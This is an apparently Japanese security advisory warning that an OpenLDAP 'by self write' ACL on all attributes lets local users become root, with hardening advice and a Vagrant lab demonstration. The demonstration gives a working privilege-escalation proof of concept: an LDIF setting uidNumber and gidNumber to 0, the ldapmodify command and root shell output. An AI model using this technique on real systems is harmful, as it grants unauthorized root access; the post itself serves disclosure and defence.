概要
openldap の slapd.conf の設定で、access to * に by self write と入れてませんか? この設定は非常に危険なので今すぐに見直すべきです。
何が起こるの?
詳細はブログ記事やgithubに上げたVagrant一式を見てください。
簡単に言うと、ldap.conf や sudoers の設定にもよりますが、ログインできるローカルユーザが root になれてしまいます。
どう設定すれば良いのか
「ユーザがldapmodifyコマンドなどを使える」ことを意識してきちんと ACL を設定することです。例えば、by self write を付けるのは userPassword, shadowLastChanged, loginShell, gecos などに限定するとか。逆に変更されてはまずいものを先に read-only にしてから by self write するとか。
デモンストレーション
> vagrant up
Bringing machine 'default' up with 'virtualbox' provider...
==> default: Checking if box 'hashicorp/precise32' is up to date...
==> default: Clearing any previously set forwarded ports...
==> default: Clearing any previously set network interfaces...
==> default: Preparing network interfaces based on configuration...
default: Adapter 1: nat
==> default: Forwarding ports...
default: 22 => 2222 (adapter 1)
==> default: Booting VM...
==> default: Waiting for machine to boot. This may take a few minutes...
default: SSH address: 127.0.0.1:2222
default: SSH username: vagrant
default: SSH auth method: private key
default: Warning: Connection timeout. Retrying...
==> default: Machine booted and ready!
==> default: Checking for guest additions in VM...
default: The guest additions on this VM do not match the installed version of
default: VirtualBox! In most cases this is fine, but in rare cases it can
default: prevent things such as shared folders from working properly. If you see
default: shared folder errors, please make sure the guest additions within the
default: virtual machine match the version of VirtualBox you have installed on
default: your host and reload your VM.
default:
default: Guest Additions Version: 4.2.0
default: VirtualBox Version: 4.3
==> default: Mounting shared folders...
default: /vagrant => C:/Users/kounoike/Documents/vagrant/ldap-server
default: /tmp/vagrant-chef-3/chef-solo-1/cookbooks => C:/Users/kounoike/Documents/vagrant/ldap-server/berks-cookbooks
default: /tmp/vagrant-chef-3/chef-solo-2/cookbooks => C:/Users/kounoike/Documents/vagrant/ldap-server/cookbooks
==> default: Machine already provisioned. Run `vagrant provision` or use the `--provision`
==> default: to force provisioning. Provisioners marked to run always will still run.
> vagrant ssh -- -l user1
user1@127.0.0.1's password:user1
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
Last login: Fri Sep 12 16:01:17 2014 from 10.0.2.2
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
user1@precise32:~$ id
uid=2000(user1) gid=2000(user1) groups=2000(user1)
この時点ではuid=2000の一般ユーザ。そしてこんなLDIFを用意する。
usermod.ldif
changetype: modify
replace: uidNumber
uidNumber: 0
-
replace: gidNumber
gidNumber: 0
このLDIFを用いて、自分自身のDNでバインドしてエントリを書き換える。
user1@precise32:~$ ldapmodify -D "uid=user1,ou=People,dc=example,dc=com" -w user1 -f /vagrant/usermod.ldif
一度ログオフして再度ログインすれば攻撃完了。
>vagrant ssh -- -l user1
user1@127.0.0.1's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
167 packages can be updated.
77 updates are security updates.
New release '14.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Welcome to your Vagrant-built virtual machine.
root@precise32:~# id
uid=0(root) gid=0(root) groups=0(root),2000(user1)